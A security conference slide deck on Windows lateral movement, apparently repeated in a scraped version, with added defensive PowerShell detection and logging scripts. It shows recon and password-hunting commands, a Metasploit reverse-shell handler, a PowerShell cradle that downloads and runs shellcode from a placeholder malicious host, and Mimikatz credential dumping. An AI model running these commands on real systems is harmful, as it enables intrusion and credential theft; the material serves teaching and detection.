LATERAL MOVEMENT
How attackers quietly traverse your networks
Xavier Ashe
VP, Drawbridge Networks
@xavierashe
ABOUT XAVIER
• Currently VP of Drawbridge Networks
• Hacking since the late 80s
• First half of my career was implementing security
• Second half of my career has been security consulting, VARs, and vendors
• Georgia Institute of Technology: Computer Engineering with International Affairs minor
• Twitter: @xavierashe
KILL CHAIN IS OUTDATED
Recon → Weaponize → Delivery → Exploit → Install → C&C → Action
KILL CHAIN, UPDATED
Recon → Weaponize → Delivery → Exploit → Persistence → Lateral Movement → Action
WHAT IS LATERAL MOVEMENT?
(Diagram: Marketing PC, Sales PC, Executive PC, IT Laptop, Domain Controller, Web Server)
THREE TYPES OF RECON
• Passive Information Gathering
• Semi-passive Information Gathering
• Active Information Gathering
YOU’VE GOT A REMOTE SHELL, NOW WHAT?
• systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
• hostname
• echo %username%
• net users
• net user <username>
• echo %userdomain%
• echo %userdnsdomain%
• nslookup -querytype=SRV _LDAP._TCP.DC._MSDCS.<domain>
• net start
• ipconfig /all
• route print
• arp -A
• netstat -ano
• netsh firewall show state
• netsh firewall show config
• schtasks /query /fo LIST /v
• tasklist /SVC
• DRIVERQUERY
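The same checklist seen from the defender's side, as an added example that is not part of the talk: a function that takes process-creation records in the shape of Security event 4688 (with command-line auditing) or Sysmon event 1 and flags a host/user pair that runs many distinct discovery commands from this list within a short window. The window, threshold and sample records are constructed for the demo.

```powershell
# Added example, not from the talk. Groups process-creation records by host and user
# and raises one alert when a single account runs >= $Threshold distinct discovery
# commands from the slide's list within $WindowMinutes.

# Regexes keyed by the recon step they correspond to (-match is case-insensitive).
$DiscoveryPatterns = @{
    'os-version'    = '^\s*systeminfo'
    'hostname'      = '^\s*hostname'
    'local-users'   = '^\s*net\s+users?\b'
    'domain-env'    = 'echo\s+%user(dns)?domain%'
    'dc-srv-lookup' = 'nslookup.*-querytype=SRV.*_ldap\._tcp'
    'services'      = '^\s*net\s+start\b'
    'ipconfig'      = '^\s*ipconfig\s+/all'
    'route-print'   = '^\s*route\s+print'
    'arp-cache'     = '^\s*arp\s+-a'
    'netstat'       = '^\s*netstat\s+-ano'
    'firewall'      = '^\s*netsh\s+firewall\s+show'
    'sched-tasks'   = '^\s*schtasks\s+/query'
    'tasklist-svc'  = '^\s*tasklist\s+/svc'
    'drivers'       = '^\s*driverquery'
}

function Find-DiscoveryBurst {
    param(
        # Objects with Host, User, Time ([datetime]) and CommandLine properties.
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $WindowMinutes = 10,
        [int] $Threshold = 5
    )
    $alerts = @()
    foreach ($group in ($Events | Group-Object -Property Host, User)) {
        $sorted = @($group.Group | Sort-Object -Property Time)
        # Slide a window starting at each event; stop at the first window that trips.
        for ($i = 0; $i -lt $sorted.Count; $i++) {
            $start = $sorted[$i].Time
            $end   = $start.AddMinutes($WindowMinutes)
            $seen  = @{}
            foreach ($e in $sorted) {
                if ($e.Time -lt $start -or $e.Time -gt $end) { continue }
                foreach ($kv in $DiscoveryPatterns.GetEnumerator()) {
                    if ($e.CommandLine -match $kv.Value) { $seen[$kv.Key] = $true }
                }
            }
            if ($seen.Count -ge $Threshold) {
                $alerts += [pscustomobject]@{
                    Host        = $sorted[0].Host
                    User        = $sorted[0].User
                    WindowStart = $start
                    Distinct    = $seen.Count
                    Steps       = (@($seen.Keys) | Sort-Object) -join ', '
                }
                break
            }
        }
    }
    return $alerts
}

# Constructed sample telemetry (not real logs). WS01/alice mimics the slide's
# post-exploitation checklist; WS02/bob is ordinary admin activity hours apart.
$t0 = [datetime]'2016-11-05T10:00:00'
$SampleEvents = @(
    [pscustomobject]@{ Host='WS01'; User='CORP\alice'; Time=$t0;                 CommandLine='systeminfo | findstr /B /C:"OS Name" /C:"OS Version"' }
    [pscustomobject]@{ Host='WS01'; User='CORP\alice'; Time=$t0.AddSeconds(5);   CommandLine='hostname' }
    [pscustomobject]@{ Host='WS01'; User='CORP\alice'; Time=$t0.AddSeconds(20);  CommandLine='net users' }
    [pscustomobject]@{ Host='WS01'; User='CORP\alice'; Time=$t0.AddSeconds(40);  CommandLine='nslookup -querytype=SRV _LDAP._TCP.DC._MSDCS.corp.local' }
    [pscustomobject]@{ Host='WS01'; User='CORP\alice'; Time=$t0.AddMinutes(1);   CommandLine='ipconfig /all' }
    [pscustomobject]@{ Host='WS01'; User='CORP\alice'; Time=$t0.AddMinutes(1.5); CommandLine='netstat -ano' }
    [pscustomobject]@{ Host='WS01'; User='CORP\alice'; Time=$t0.AddMinutes(2);   CommandLine='notepad.exe notes.txt' }
    [pscustomobject]@{ Host='WS02'; User='CORP\bob';   Time=$t0.AddHours(-1);    CommandLine='ipconfig /all' }
    [pscustomobject]@{ Host='WS02'; User='CORP\bob';   Time=$t0.AddHours(4);     CommandLine='tasklist /SVC' }
)

# Only WS01 / CORP\alice trips the rule (6 distinct steps inside 10 minutes).
Find-DiscoveryBurst -Events $SampleEvents | Format-Table -AutoSize
```

Feed it real records by projecting Get-WinEvent output for 4688 (NewProcessName plus CommandLine) or Sysmon event 1 into the same four properties; any one of these commands is normal on its own, so the signal is the burst, not the command.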
FIND THE DOMAIN CONTROLLERS
SERVICE PRINCIPAL NAMES (SPNS)
• Find SPNs linked to a certain computer: setspn -L <ServerName>
• Find SPNs linked to a certain user account: setspn -L <domain\user>
• PowerShell: Get-NetUser -SPN
PRIVILEGE ESCALATION
• Look for missing patches, known exploits
• Look in automated install answer files for passwords
• Get saved passwords from Group Policy (Metasploit or Get-GPPPassword)
• Look for registry setting "AlwaysInstallElevated"
• HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
• HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
• Hail Mary
• dir /s *pass* == *cred* == *vnc* == *.config*
• findstr /si password *.xml *.ini *.txt
• reg query HKLM /f password /t REG_SZ /s
• reg query HKCU /f password /t REG_SZ /s
PRIVILEGE ESCALATION - ADVANCED
• Vulnerable Windows Services
• DLL hijacking using vulnerable folders in the PATH
• Replace the executable run by an existing scheduled task
PRIVILEGE ESCALATION – HACKING A SERVICE
OR JUST RUN POWERUP (INVOKE-ALLCHECKS)
• If you are an admin in a medium integrity process (exploitable with bypassuac)
• for any unquoted service path issues
• for any services with misconfigured ACLs (exploitable with service_*)
• any improper permissions on service executables (exploitable with service_exe_*)
• for any leftover unattend.xml files
• if the AlwaysInstallElevated registry key is set
• if any Autologon credentials are left in the registry
• for any encrypted web.config strings and application pool passwords
• for any %PATH% .DLL hijacking opportunities (exploitable with write_dllhijacker)
POWERSHELL
There are a number of reasons why attackers love PowerShell:
• Run code in memory without touching disk
• Download & execute code from another system
• Direct access to .NET & Win32 API
• Built-in remoting
• CMD.exe is commonly blocked, though not PowerShell
• Most organizations are not watching PowerShell activity
• Many endpoint security products don’t have visibility into PowerShell activity
POWERSHELL V5 SECURITY ENHANCEMENTS
• Script block logging
• System-wide transcripts
• Constrained PowerShell enforced with AppLocker
• The Anti-Malware Scan Interface (AMSI)
• There are two primary methods of bypassing AMSI (at least for now):
• Provide & use a custom amsi.dll and call that one from a custom EXE.
• Matt Graeber described how to use reflection to bypass AMSI
REMOTE ACCESS WITH NO HIT TO DISK
Create shellcode from Metasploit:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST <Your local host>
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit
PowerShell shellcode injection:
IEX (New-Object Net.WebClient).DownloadString("https://<Malicious URL>/Invoke-Shellcode.ps1")
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost <malicious IP> -Lport 443 -Force
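Putting the v5 enhancements from the previous slide to work against exactly this in-memory cradle, as an added example that is not from the talk: the first function enables script block logging, transcription and module logging through the policy registry keys Group Policy itself writes; the second hunts the resulting 4104 events for the download-and-inject pattern above. $TranscriptDir and the indicator list are assumptions.

```powershell
# Added example, not from the talk: enable PowerShell v5 audit logging locally,
# then look for the Net.WebClient / Invoke-Shellcode cradle in script block events.

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Enable-PowerShellAuditLogging {
    param([string] $TranscriptDir = 'C:\PSTranscripts')  # assumed; a write-only share is better
    $settings = @{
        "$PolicyRoot\ScriptBlockLogging"        = @{ EnableScriptBlockLogging = 1 }
        "$PolicyRoot\Transcription"             = @{ EnableTranscripting = 1; EnableInvocationHeader = 1; OutputDirectory = $TranscriptDir }
        "$PolicyRoot\ModuleLogging"             = @{ EnableModuleLogging = 1 }
        "$PolicyRoot\ModuleLogging\ModuleNames" = @{ '*' = '*' }   # log every module
    }
    foreach ($key in $settings.Keys) {
        if (-not (Test-Path -Path $key)) { New-Item -Path $key -Force | Out-Null }
        foreach ($name in $settings[$key].Keys) {
            Set-ItemProperty -Path $key -Name $name -Value $settings[$key][$name]
        }
    }
}

function Find-DownloadCradle {
    param(
        [datetime] $Since = (Get-Date).AddDays(-7),
        # Strings that appear in the cradle and the shellcode-injection stage on the slide.
        [string[]] $Indicators = @('Net\.WebClient', 'DownloadString', '\bIEX\b', 'Invoke-Expression',
                                   'Invoke-Shellcode', 'reverse_https', 'VirtualAlloc', 'FromBase64String')
    )
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $Since }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # 4104 payload: [0] fragment no., [1] fragment total, [2] script block text,
        # [3] script block id, [4] path. Because the block is logged as it is compiled,
        # the decoded content of an IEX'd string shows up even when the wrapper was obfuscated.
        $text = [string]$_.Properties[2].Value
        $hits = @($Indicators | Where-Object { $text -match $_ })
        if ($hits.Count -ge 2) {   # two indicators together cuts noise from ordinary admin scripts
            [pscustomobject]@{
                Time          = $_.TimeCreated
                UserSid       = $_.UserId
                ScriptBlockId = $_.Properties[3].Value
                Hits          = $hits -join ', '
                Snippet       = $text.Substring(0, [Math]::Min(100, $text.Length)) -replace '\s+', ' '
            }
        }
    }
}

# Run elevated once per host (or push the same keys by GPO), then review regularly:
# Enable-PowerShellAuditLogging
Find-DownloadCradle -Since (Get-Date).AddDays(-1) | Format-Table -AutoSize -Wrap
```

The logging is the control that matters: it turns the "no hit to disk" advantage into a recorded script block, and the hunt only works on events generated after it is enabled.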
POWERSPLOIT
• Invoke-DllInjection.ps1
• Invoke-Shellcode.ps1
• Invoke-WmiCommand.ps1
• Get-GPPPassword.ps1
• Get-Keystrokes.ps1
• Get-TimedScreenshot.ps1
• Get-VaultCredential.ps1
• Invoke-CredentialInjection.ps1
• Invoke-Mimikatz.ps1
• Invoke-NinjaCopy.ps1
• Invoke-TokenManipulation.ps1
• Out-Minidump.ps1
• VolumeShadowCopyTools.ps1
• Invoke-ReflectivePEInjection.ps1
INVOKE-MIMIKATZ
NO DOMAIN ADMINS YET?
Invoke-Mimikatz -DumpCreds | Out-File -Append "c:\evilplace\$env:computername.txt"
OTHER WAYS TO GET DOMAIN ADMIN
• Passwords in SYSVOL & Group Policy Preferences
• Exploit the MS14-068 Kerberos Vulnerability on a Domain Controller Missing the Patch
• Kerberos TGS Service Ticket Offline Cracking (Kerberoast)
• Gain Access to the Active Directory Database File (ntds.dit)
• Compromise an account with rights to logon to a Domain Controller
• Then run Mimikatz
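The defensive side of the Mimikatz and Kerberoast items above, as an added example that is not from the talk: one function checks the two LSA settings that decide what a credential dump can read, the other hunts TGS requests (Security event 4769 on a domain controller) for the RC4 pattern Kerberoast produces. The distinct-service threshold is an assumption to tune per environment.

```powershell
# Added example, not from the talk: credential-theft exposure check plus a Kerberoast hunt.

function Get-CredentialTheftExposure {
    $lsa     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $wdigest = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
    # WDigest keeps plaintext passwords in LSASS while UseLogonCredential = 1; an absent
    # value is treated as not OK here because older builds default to caching.
    $useLogonCred = (Get-ItemProperty -Path $wdigest -Name UseLogonCredential -ErrorAction SilentlyContinue).UseLogonCredential
    # RunAsPPL = 1 makes LSASS a protected process, so unsigned tools cannot open it for reading.
    $runAsPpl = (Get-ItemProperty -Path $lsa -Name RunAsPPL -ErrorAction SilentlyContinue).RunAsPPL
    @(
        [pscustomobject]@{ Setting = 'WDigest UseLogonCredential'; Value = $useLogonCred; Recommended = 0; Ok = ($useLogonCred -eq 0) }
        [pscustomobject]@{ Setting = 'LSA RunAsPPL';               Value = $runAsPpl;     Recommended = 1; Ok = ($runAsPpl -eq 1) }
    )
}

function Find-KerberoastRequest {
    param(
        [datetime] $Since = (Get-Date).AddDays(-1),
        [int] $MinDistinctServices = 3   # assumed threshold: one user pulling tickets for many SPNs
    )
    $filter = @{ LogName = 'Security'; Id = 4769; StartTime = $Since }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # 4769 payload: [0] TargetUserName, [1] TargetDomainName, [2] ServiceName, [3] ServiceSid,
        # [4] TicketOptions, [5] TicketEncryptionType, [6] IpAddress, [7] IpPort, [8] Status
        $p = $_.Properties
        [pscustomobject]@{
            Time      = $_.TimeCreated
            Requester = [string]$p[0].Value
            Service   = [string]$p[2].Value
            EncType   = [string]$p[5].Value
            Client    = [string]$p[6].Value
            Status    = [string]$p[8].Value
        }
    } |
    Where-Object {
        # RC4-HMAC (0x17) is what Kerberoast asks for so the ticket cracks offline;
        # computer accounts and krbtgt are not worthwhile targets, so drop them.
        $_.EncType -eq '0x17' -and $_.Status -eq '0x0' -and
        $_.Service -notmatch '\$$' -and $_.Service -ne 'krbtgt'
    } |
    Group-Object -Property Requester |
    ForEach-Object {
        $services = @($_.Group.Service | Sort-Object -Unique)
        if ($services.Count -ge $MinDistinctServices) {
            [pscustomobject]@{
                Requester = $_.Name
                Clients   = (@($_.Group.Client | Sort-Object -Unique) -join ', ')
                Services  = $services.Count
                First     = ($_.Group.Time | Measure-Object -Minimum).Minimum
                Examples  = ($services | Select-Object -First 5) -join ', '
            }
        }
    }
}

Get-CredentialTheftExposure | Format-Table -AutoSize
# On a domain controller, or against forwarded Security logs:
Find-KerberoastRequest | Format-Table -AutoSize -Wrap
```

A service account that legitimately needs RC4 will show up every day; the useful signal is a user account requesting RC4 tickets for many services it never touches otherwise.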
POWERSHELL EMPIRE
Capabilities:
• PowerShell based Remote Access Trojan (RAT).
• Python server component (Kali Linux).
• AES Encrypted C2 channel.
• Dumps and tracks credentials in database.
NISHANG
• Check-VM
• Remove-Update
• Invoke-CredentialsPhish
PS>ATTACK
Use for AV bypass. Its build tool produces a new encrypted exe every time.
Contains
• PowerTools
• PowerUp
• PowerView
• Nishang
• Powercat
• Inveigh
Powersploit:
• Invoke-Mimikatz
• Get-GPPPassword
• Invoke-NinjaCopy
• Invoke-Shellcode
• Invoke-WMICommand
• VolumeShadowCopyTools
REDSNARF
New tool just released by NCC Group
• Retrieval of local SAM hashes
• Enumeration of user(s) running with elevated system privileges and their corresponding LSA secrets password
• Retrieval of MS cached credentials
• Pass-the-hash
• Quickly identify weak and guessable username/password combinations (default of administrator/Password01)
• The ability to retrieve hashes across a range
• Hash spraying:
• Credsfile will accept a mix of pwdump, fgdump and plaintext username and password separated by a space
• Lsass dump for offline analysis with Mimikatz
• Dumping of Domain controller hashes using NTDSUtil and retrieval of NTDS.dit for local parsing
• Dumping of Domain controller hashes using the drsuapi method
• Retrieval of Scripts and Policies folder from a Domain controller and parsing for 'password' and 'administrator'
• Ability to decrypt cpassword hashes
• Ability to start a shell on a remote machine
• The ability to clear the event logs (application, security, setup or system)
• Results and logs are saved on a per-host basis for analysis
REFERENCES
• SPNs: http://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
• SPN Query: https://technet.microsoft.com/en-us/library/ee176972.aspx
• Active Directory Security: https://adsecurity.org
• Remote Access PowerShell with Metasploit: http://www.redblue.team/2016/01/powershell-traceless-threat-and-how-to.html
• No Domain Admin yet? https://365lab.net/tag/invoke-mimikatz/
• Privilege Escalation: http://www.fuzzysecurity.com/tutorials/16.html
• PowerUp: http://www.powershellempire.com/?page_id=378
• PowerSploit: https://github.com/PowerShellMafia/PowerSploit
• Mimikatz: https://github.com/gentilkiwi/mimikatz
• PowerShell Empire: https://github.com/powershellempire/empire
• Nishang: https://github.com/samratashok/nishang
• PS>Attack: https://github.com/jaredhaight/psattack
• RedSnarf: https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/november/introducing-redsnarf-and-the-importance-of-being-careful/
Contact me!
@XavierAshe

Lateral Movement - Phreaknik 2016

  • 1. LATERAL MOVEMENT How attackers quietly transverse your Networks Xavier Ashe VP, Drawbridge Networks @xavierashe
  • 2. ABOUT XAVIER • Currently VP of Drawbridge Networks • Hacking since the late 80s • First half my career was implementing Security • Second half career is security consulting, VARs, and Vendors • Georgia Institute Of Technology: Computer Engineering with International Affairs minor • Twitter: @xavierashe
  • 3. KILL CHAIN IS OUTDATED Reco n Weaponiz e Deliver y Exploi t Insta ll C&C Actio n
  • 5. WHAT IS LATERAL MOVEMENT? Marketing PCSales PC Executive PCIT Laptop Domain Controller Web Server
  • 6. THREETYPES OF RECON • Passive Information Gathering • Semi-passive Information Gathering • Active Information Gathering
  • 7. YOU’VE GOT REMOTE SHELL, NOW WHAT? • systeminfo | findstr /B /C:"OS Name" /C:"OS Version" • hostname • echo %username% • net users • net user <username> • echo %userdomain% • echo %userdnsdomain% • nslookup -querytype=SRV _LDAP._TCP.DC._MSDCS.<domain> • net start • ipconfig /all • route print • arp -A • netstat -ano • netsh firewall show state • netsh firewall show config • schtasks /query /fo LIST /v • tasklist /SVC • DRIVERQUERY
  • 9. SERVICE PRINCIPAL NAMES (SPNS) • Find SPNs linked to a certain computer setspn -L <ServerName> • Find SPNs linked to a certain user account setspn -L <domainuser> • Powershell Get-NetUser -SPN
  • 10. PRIVILEGE ESCALATION • Look for missing patches, known exploits • Look in automated install answer files for passwords • Get saved passwords from Group Policy (metasploit or Get- GPPPaassword) • Look for registry setting "AlwaysInstallElevated“ • HKLMSOFTWAREPoliciesMicrosoftWindowsInstallerAlwaysInstallElevated • HKCUSOFTWAREPoliciesMicrosoftWindowsInstallerAlwaysInstallElevated • Hail Mary • dir /s *pass* == *cred* == *vnc* == *.config* • findstr /si password *.xml *.ini *.txt • reg query HKLM /f password /t REG_SZ /s • reg query HKCU /f password /t REG_SZ /s
  • 11. PRIVILEGE ESCALATION - ADVANCED • Vulnerable Windows Services • DLL hijacking using vulnerable folders in the PATH • Replace executable with existing scheduled task.
  • 12. PRIVILEGE ESCALATION – HACKING A SERVICE
  • 13. OR JUST RUN POWERUP (INVOKE-ALLCHECKS) • If you are an admin in a medium integrity process (exploitable with bypassuac) • for any unquoted service path issues • for any services with misconfigured ACLs (exploitable with service_*) • any improper permissions on service executables (exploitable with service_exe_*) • for any leftover unattend.xml files • if the AlwaysInstallElevated registry key is set • if any Autologon credentials are left in the registry • for any encrypted web.config strings and application pool passwords • for any %PATH% .DLL hijacking opportunities (exploitable with write_dllhijacker)
  • 14. POWERSHELL There are a number of reasons why attackers love PowerShell: • Run code in memory without touching disk • Download & execute code from another system • Direct access to .NET & Win32 API • Built-in remoting • CMD.exe is commonly blocked, though not PowerShell • Most organizations are not watching PowerShell activity • Many endpoint security products don’t have visibility into PowerShell activity
  • 15. POWERSHELLV5 SECURITY ENHANCEMENTS • Script block logging • System-wide transcripts • Constrained PowerShell enforced with AppLocker • The Anti-Malware Scan Interface (AMSI) • There are two primary methods of bypassing AMSI (at least for now): • Provide & use a custom amsi.dll and call that one from custom EXE. • Matt Graeber described how to use reflection to bypass AMSI
  • 16. REMOTE ACCESS WITH NO HITTO DISK Create Shellcode from Metasploit msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https msf exploit(handler) > set LHOST <Your local host> msf exploit(handler) > set LPORT 443 msf exploit(handler) > exploit Powershell Shellcode Injection IEX (New-Object Net.WebClient).DownloadString("https: //<Malicious URL>/Invoke- Shellcode.ps1") Invoke-ShellCode -Payload windows/meterpreter/reverse_https - Lhost <malicious IP> -Lport 443 - Force
  • 17. POWERSPLOIT • Invoke-DllInjection.ps1 • Invoke-Shellcode.ps1 • Invoke-WmiCommand.ps1 • Get-GPPPassword.ps1 • Get-Keystrokes.ps1 • Get-TimedScreenshot.ps1 • Get-VaultCredential.ps1 • Invoke-CredentialInjection.ps1 • Invoke-Mimikatz.ps1 • Invoke-NinjaCopy.ps1 • Invoke-TokenManipulation.ps1 • Out-Minidump.ps1 • VolumeShadowCopyTools.ps1 • Invoke- ReflectivePEInjection.ps1
19. NO DOMAIN ADMINS YET?
Invoke-Mimikatz -DumpCreds | Out-File -Append c:\evilplace\$env:computername.txt
20. OTHER WAYS TO GET DOMAIN ADMIN
• Passwords in SYSVOL & Group Policy Preferences
• Exploit the MS14-068 Kerberos vulnerability on a Domain Controller missing the patch
• Kerberos TGS service ticket offline cracking (Kerberoast)
• Gain access to the Active Directory database file (ntds.dit)
• Compromise an account with rights to log on to a Domain Controller
  • Then run Mimikatz
21. POWERSHELL EMPIRE
Capabilities:
• PowerShell based Remote Access Trojan (RAT).
• Python server component (Kali Linux).
• AES encrypted C2 channel.
• Dumps and tracks credentials in database.
23. PS>ATTACK
Use for AV bypass. Build tool produces a new encrypted exe every time.
Contains:
• PowerTools
• PowerUp
• PowerView
• Nishang
• Powercat
• Inveigh
PowerSploit:
• Invoke-Mimikatz
• Get-GPPPassword
• Invoke-NinjaCopy
• Invoke-Shellcode
• Invoke-WMICommand
• VolumeShadowCopyTools
24. REDSNARF
New tool just released by NCC Group
• Retrieval of local SAM hashes
• Enumeration of user(s) running with elevated system privileges and their corresponding LSA secrets password
• Retrieval of MS cached credentials
• Pass-the-hash
• Quickly identify weak and guessable username/password combinations (default of administrator/Password01)
• The ability to retrieve hashes across a range
• Hash spraying:
  • Credsfile will accept a mix of pwdump, fgdump and plaintext username and password separated by a space
• Lsass dump for offline analysis with Mimikatz
• Dumping of Domain Controller hashes using NTDSUtil and retrieval of NTDS.dit for local parsing
• Dumping of Domain Controller hashes using the drsuapi method
• Retrieval of Scripts and Policies folder from a Domain Controller and parsing for 'password' and 'administrator'
• Ability to decrypt cpassword hashes
• Ability to start a shell on a remote machine
• The ability to clear the event logs (application, security, setup or system)
• Results and logs are saved on a per-host basis for analysis
25. REFERENCES
• SPNs: http://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
• SPN Query: https://technet.microsoft.com/en-us/library/ee176972.aspx
• Active Directory Security: https://adsecurity.org
• Remote Access PowerShell with Metasploit: http://www.redblue.team/2016/01/powershell-traceless-threat-and-how-to.html
• No Domain Admin yet? https://365lab.net/tag/invoke-mimikatz/
• Privilege Escalation: http://www.fuzzysecurity.com/tutorials/16.html
• PowerUp: http://www.powershellempire.com/?page_id=378
• PowerSploit: https://github.com/PowerShellMafia/PowerSploit
• Mimikatz: https://github.com/gentilkiwi/mimikatz
• PowerShell Empire: https://github.com/powershellempire/empire
• Nishang: https://github.com/samratashok/nishang
• PS>Attack: https://github.com/jaredhaight/psattack
• RedSnarf: https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/november/introducing-redsnarf-and-the-importance-of-being-careful/
Contact me! @XavierAshe

Editor's notes

1. Reconnaissance – Learning about the target using many techniques.
   Weaponization – Combining your vector of attack with a malicious payload.
   Delivery – Actually transmitting the payload via some communications vector.
   Exploitation – Taking advantage of some software or human weakness to get your payload to run.
   Installation – The payload establishes persistence on an individual host.
   Command & Control (C2) – The malware calls home, providing attacker control.
   Actions on Objectives – The bad actor steals or does whatever he was planning on doing.
2. Passive Information Gathering: Passive information gathering is generally only useful if there is a very clear requirement that the information gathering activities never be detected by the target. This type of profiling is technically difficult to perform, as we never send any traffic to the target organization, either from one of our own hosts or from “anonymous” hosts or services across the Internet. This means we can only use and gather archived or stored information. As such, this information can be out of date or incorrect, as we are limited to results gathered from a third party.

   Semi-passive Information Gathering: The goal of semi-passive information gathering is to profile the target with methods that would appear like normal Internet traffic and behavior. We query only the published name servers for information; we aren’t performing in-depth reverse lookups or brute-force DNS requests, and we aren’t searching for “unpublished” servers or directories. We aren’t running network-level port scans or crawlers, and we only look at metadata in published documents and files, not actively seeking hidden content. The key here is not to draw attention to our activities. Post mortem, the target may be able to go back and discover the reconnaissance activities, but they shouldn’t be able to attribute the activity back to anyone.

   Active Information Gathering: Active information gathering should be expected to be detected by the target as suspicious or malicious behavior. During this stage we are actively mapping network infrastructure (think full port scans, nmap -p1-65535), actively enumerating and/or vulnerability scanning the open services, and actively searching for unpublished directories, files, and servers. Most of this activity falls into the typical “reconnaissance” or “scanning” activities of a standard pentest.
3. Note that the value in %USERDOMAIN% may not be the same as the one returned by the systeminfo command. %USERDOMAIN% gives the domain name the user account belongs to, which could be different from the domain of the computer. Also, this may give you the NetBIOS name of the computer, not the DNS/FQDN name.
4. When the box you compromise is connected to a domain, it is well worth looking for the Groups.xml file, which is stored in SYSVOL. Any authenticated user will have read access to this file. The password in the XML file is "obscured" from the casual user by encrypting it with AES; I say obscured because the static key is published on the MSDN website, allowing for easy decryption of the stored value. The next thing we will look for is a strange registry setting, "AlwaysInstallElevated": if this setting is enabled, it allows users of any privilege level to install *.msi files as NT AUTHORITY\SYSTEM. It seems like a strange idea to me that you would create low privilege users (to restrict their use of the OS) but give them the ability to install programs as SYSTEM.
5. Metasploit can be used to
6. Script block logging – logs the PowerShell code actually executed by PowerShell. Without this enabled, only the obfuscated code is logged, making it far more difficult to create useful indicators. System-wide transcripts – When enabled, a transcript file can be written to a write-only share for each PowerShell user per computer. If the share is offline, the computer will cache the file data until it’s back online. Constrained PowerShell enforced with AppLocker – When PowerShell v5 is installed and AppLocker is in Allow mode, PowerShell operates in constrained language mode, which is a limited language mode preventing Windows API access. For more on this, keep reading. The Anti-Malware Scan Interface (AMSI) in Windows 10 enables all script code to be scanned prior to execution by PowerShell and other Windows scripting engines. The Anti-Virus/Anti-Malware solution on the system must support AMSI for it to scan the code. The great benefit is that all code delivered to the PowerShell engine is scanned, even code injected into memory that was downloaded from the internet. As of mid-2016, only Microsoft Defender and AVG support AMSI.
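Turning on the first two controls from slide 15 and this note (script block logging and system-wide transcripts), as an added example that is not part of the deck: it writes the same HKLM policy values Group Policy would, then reports the state and whether 4104 script-block events are actually arriving. The transcript share path is a placeholder; the function names are my own.

```powershell
# Added example, not from the deck. Enables PowerShell v5 script block logging and transcription
# through the policy registry keys (requires WMF/PowerShell 5 and an elevated prompt).
function Enable-PowerShellLogging {
    param(
        # Placeholder: a write-only share each host can append transcripts to (see note 6 above).
        [string]$TranscriptPath = '\\FILESERVER\PSTranscripts$'
    )
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    $settings = @{
        "$base\ScriptBlockLogging" = @{ EnableScriptBlockLogging = 1 }
        "$base\Transcription"      = @{ EnableTranscripting = 1; EnableInvocationHeader = 1; OutputDirectory = $TranscriptPath }
    }
    foreach ($key in $settings.Keys) {
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        foreach ($name in $settings[$key].Keys) {
            $value = $settings[$key][$name]
            $type  = if ($value -is [int]) { 'DWord' } else { 'String' }   # OutputDirectory is REG_SZ
            New-ItemProperty -Path $key -Name $name -Value $value -PropertyType $type -Force | Out-Null
        }
    }
}

# Reports each control plus evidence that script block logging is producing events:
# 4104 in Microsoft-Windows-PowerShell/Operational is the "Execute a Remote Command" script block record.
function Test-PowerShellLogging {
    $base   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    $checks = @(
        @{ Control = 'ScriptBlockLogging'; Key = "$base\ScriptBlockLogging"; Name = 'EnableScriptBlockLogging' },
        @{ Control = 'Transcription';      Key = "$base\Transcription";      Name = 'EnableTranscripting' }
    )
    foreach ($c in $checks) {
        $v = (Get-ItemProperty -Path $c.Key -Name $c.Name -ErrorAction SilentlyContinue).($c.Name)
        [pscustomobject]@{ Control = $c.Control; Enabled = ($v -eq 1) }
    }
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = (Get-Date).AddDays(-1) }
    $count  = (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | Measure-Object).Count
    [pscustomobject]@{ Control = 'ScriptBlockEvents24h'; Enabled = ($count -gt 0) }
}
```

A zero count for ScriptBlockEvents24h right after enabling is normal; run any PowerShell script and re-check, since the value only proves the pipeline from engine to event log is working.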
7. Invoke-CredentialInjection.ps1 - This script allows an attacker to create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon). The script either creates a suspended winlogon.exe process running as SYSTEM, or uses an existing WinLogon process. Then, it injects a DLL into winlogon.exe which calls LsaLogonUser to create a logon from within winlogon.exe (which is where it is called from when a user logs in using RDP or logs on locally). The injected DLL then impersonates the new logon token with its current thread so that it can be kidnapped using Invoke-TokenManipulation.
